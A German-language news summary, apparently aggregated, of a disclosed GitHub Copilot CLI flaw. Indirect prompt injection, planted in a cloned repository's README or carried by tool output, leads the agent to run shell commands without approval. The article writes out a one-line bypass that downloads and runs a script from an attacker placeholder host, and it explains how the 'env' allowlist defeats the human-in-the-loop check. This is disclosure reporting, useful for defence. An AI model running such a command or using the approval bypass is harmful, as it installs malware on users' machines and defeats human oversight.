GitHub Copilot CLI-Schwachstelle ermöglicht Malware-Ausführung durch Prompt-Injection
Übersicht der Schwachstelle
GitHub Copilot CLI enthält Schwachstellen, die Benutzer der Ausführung beliebiger Shell-Befehle über indirekte Prompt-Injection ohne Benutzerfreigabe aussetzen. Malware kann von externen Servern heruntergeladen und ausgeführt werden, ohne dass eine Benutzerinteraktion über die anfängliche Abfrage an die Copilot CLI hinaus erforderlich ist.
Wie der Angriff funktioniert
Die Angriffskette umfasst:
- Der Benutzer fragt GitHub Copilot CLI ab, während er ein Open-Source-Repository erkundet
- Copilot stößt auf eine in einer README-Datei des geklonten Repositorys gespeicherte Prompt-Injection (oder andere Vektoren wie Websuchergebnisse, MCP-Tool-Aufrufergebnisse, Terminalbefehlsausgaben)
- Der bösartige Befehl umgeht die Human-in-the-Loop-Freigabesysteme
Umgehung von Schutzmechanismen
GitHub Copilot verwendet ein Human-in-the-Loop-Freigabesystem, das die Zustimmung des Benutzers erfordert, bevor potenziell schädliche Befehle ausgeführt werden. Dieses System wird ausgelöst, es sei denn:
- Der Benutzer hat den Befehl explizit für die automatische Ausführung konfiguriert
- Der Befehl ist Teil einer fest codierten 'Read-Only'-Liste, die im Quellcode zu finden ist
Prüfungen des Zugriffs auf externe URLs erfordern die Benutzerfreigabe für Befehle wie curl, wget oder das integrierte Web-Fetch-Tool von Copilot. Angreifer können diese Schutzmaßnahmen jedoch umgehen, indem sie Folgendes verwenden:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shDer env-Befehl steht auf der fest codierten Read-Only-Liste und wird daher automatisch ohne Freigabe ausgeführt. Da curl und sh als Argumente an env übergeben werden, werden sie vom Validator falsch geparst und nicht als Unterbefehle erkannt. Dadurch werden URL-Berechtigungsprüfungen umgangen, die auf der Erkennung von Befehlen wie curl basieren.
GitHubs Reaktion
GitHub antwortete: "Wir haben Ihren Bericht geprüft und Ihre Ergebnisse validiert. Nach interner Bewertung der Erkenntnisse haben wir festgestellt, dass es sich um ein bekanntes Problem handelt, das kein signifikantes Sicherheitsrisiko darstellt. Wir könnten diese Funktionalität in Zukunft strenger gestalten, haben aber derzeit nichts anzukündigen."
Umfang und Einschränkungen
Die beschriebenen Befehls-Parsing-Schwachstellen sind macOS-spezifisch. GitHub Copilot weist jedoch zusätzliche Schwachstellen auf, darunter sowohl betriebssystemunabhängige Risiken als auch Windows-spezifische Risiken. Andere Befehls-Parsing-Schwachstellen ermöglichen das beliebige Lesen und Schreiben von Dateien.
📖 Den vollständigen Source lesen: HN LLM Tools
👀 Siehe auch
AISI-Bewertung zeigt Claude Mythos Preview Cyber-Fähigkeiten in CTF und mehrstufigen Angriffen
Das AI Security Institute bewertete Anthropics Claude Mythos Preview und stellte fest, dass es 73 % der Capture-the-Flag-Herausforderungen auf Expertenniveau erfolgreich absolvierte und in 3 von 10 Versuchen eine 32-stufige Simulation eines Unternehmensnetzwerkangriffs löste.
Sicherheitsanalyse von KI-Agenten deckt gebrochenes Vertrauensmodell und hohe Anfälligkeitsraten auf
Eine Sicherheitsanalyse von KI-Agenten zeigt, dass das grundlegende Vertrauensmodell gebrochen ist, wobei 49 % der MCP-Pakete Sicherheitsprobleme aufweisen und indirekte Injektionen Angriffserfolgsraten von 36–98 % bei modernsten Modellen erreichen.
KI-Schwachstellen-Entdeckung übertrifft Patch-Bereitstellungszeiten
Ein Sicherheitsexperte argumentiert, dass KI-Tools wie Mythos Schwachstellen schneller finden werden, als Behebungen bereitgestellt werden können, und verweist auf Log4j-Daten, die durchschnittliche Behebungszeiten von 17 Tagen und einen Zehn-Jahres-Zeitplan für die vollständige Beseitigung zeigen.
Windows-Notizblock-App Remote Code Execution-Sicherheitsanfälligkeit CVE-2026-20841
CVE-2026-20841 ist eine Remote-Code-Ausführungsanfälligkeit in der Windows-Notepad-App. Details und Schritte zur Minderung sind im Update-Leitfaden des Microsoft Security Response Center verfügbar.